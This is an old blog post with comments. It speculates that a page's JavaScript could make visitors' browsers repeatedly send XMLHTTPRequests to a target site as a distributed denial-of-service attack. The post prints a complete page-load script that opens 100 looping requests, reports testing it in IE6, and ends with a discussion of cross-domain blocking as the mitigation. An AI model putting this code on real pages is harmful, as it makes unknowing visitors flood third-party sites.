Maybe the XMLHTTPRequest handler isn’t such a good idea…
Right, so I was thinking about the XMLHTTPRequest handler. Well, okay, actually, I was thinking of Sandra Bullock, and this idea popped into my head…
You can use XMLHTTPRequests to make requests of a web server. Fair enough. And you can make requests of another site – check. And you can make many of them on one page – yup. And finally, you don’t have to do anything with the response – you see where I’m going with this yet?
Assume you have a function for creating XMLHTTPRequest objects. Consider the following:
var urlTarget = 'www.example.com'; // The site we want to DOS
var aStack = array();
function fnHTTP (oHTTP) {
return function () {
if (oHTTP.readyState == 3) {
oHTTP.open("GET", urlTarget, true);
oHTTP.send(null);
}
}
}
function setupDOS () {
for (i=0; i<100; i++ ) {
oHTTP = GetXMLHTTPRequest();
oHTTP.open("GET", urlTarget, true);
oHTTP.onreadystatechange = fnHTTP(oHTTP);
oHTTP.send(null);
aStack.push( oHTTP );
}
}
window.onload = setupDOS;
So, a user goes to a page. In the background, after they’ve loaded the page, JavaScript is creating a whole load of XMLHTTPRequest objects, and then using these to make requests of a target site. And as each object gets serviced, it makes another request.
Thus, if you had 1,000 users, they could be making 100,000 requests of another site. And the requests would be from 1,000 different clients. Isn’t that the point of a denial of service attack? I mean, imagine if this were put on Slashdot!
I haven’t actually tried this yet – I might knock something up over the next week – but I can’t see anything that would prevent this. Did I miss anything? Is this not possible?
Update: So I wrote a script to try it. You can download it here. Basically, as is often the way, Firefox is well thought out and safe – it refuses to open an XMLHTTPRequest to a different domain. Good behaviour, I reckon.IE6, though, warns you about active content without being very specific – and if you allow the active content, the code you can download works just fine thankyou. So, all you need to do is put some dynamic content on the page so that your IE6 users allow active content, and you’re away – DOS galore!
Comments from my old blog:
I had a response from Nicholas Zakas ( http://www.nczonline.net/ ):
“I *think* IE6 SP2 effectively protects against that by disallowing cross-domain requests. I know you said that you get a simple warning about active content, but I think that only happens if you’re running the file locally. If you run it on a server, I believe that you’d just be blocked. So, in order to create a serious DDOS, you’d have to have people go to the Web site, download the file, open it, and click “I don’t care” to the IE warning. While I understand your concern, I don’t think it’s a huge security hole at this point.”
Indeed, he’s right – it does disallow cross-domain requests if the file isn’t being run locally. It’s still a little worrying – most of the manuals for the various products I work with come in HTML with ‘active content’ for example – but clearly you’re then having to rely on some form of social engineering, and you won’t get as much (or, probably, enough) activity to have a serious effect.